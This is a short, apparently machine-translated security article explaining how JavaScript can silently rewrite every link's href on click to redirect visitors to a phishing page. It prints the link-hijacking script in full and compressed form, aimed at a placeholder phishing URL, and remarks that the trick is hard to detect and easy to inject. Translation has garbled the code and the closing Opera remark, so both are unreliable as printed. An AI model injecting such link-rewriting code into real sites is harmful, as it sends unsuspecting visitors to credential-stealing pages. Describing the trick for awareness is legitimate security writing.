JavaScript controls the href attribute for phishing Analysis

A while ago, I found that JavaScript allows temporary changes to the href attribute of the <a> tag. When you change its attribute, you may not see how serious it is when you click it. However, it can trick users into disclosing their details through deception.
// Uncompressed
Var links = document. getElementsByTagName ('A ');
For (var I = 0; I <links. length; I ++ ){
Links [I]. onclick = function (){
This. href = 'HTTP: // freebuf.com/phishing /...... '; // Insert a link (You know)
};
}
 
// Compressed (100 characters exc. the link)
O = document. getElementsByTagName ('A'); for (j = 0; j <o. length; j ++) {o [j]. onclick = function () {this. href = 'HTTP: // freebuf.com/phishing /...... ';}} When you click the link, the javascript code is executed and the href attribute of the <a> tag is changed. Surprisingly, the browser actually navigated the victim to a new link. Victims generally think that it may be just a redirection link. Here we assume that website visitors are used to this redirection phenomenon, and this defect can be exploited for phishing.
This kind of phishing is hard to detect. Many people use JavaScript/jQuery framework combinations to bind <a> tags. The onclick function of each <a> tag is not so easy to unbind. A well-developed hacker can embed malicious JavaScript or inject code, because it is easy to update JavaScript (especially embedded ).
OperaExcept:OperaIt seems to be automatically fixedHrefAttribute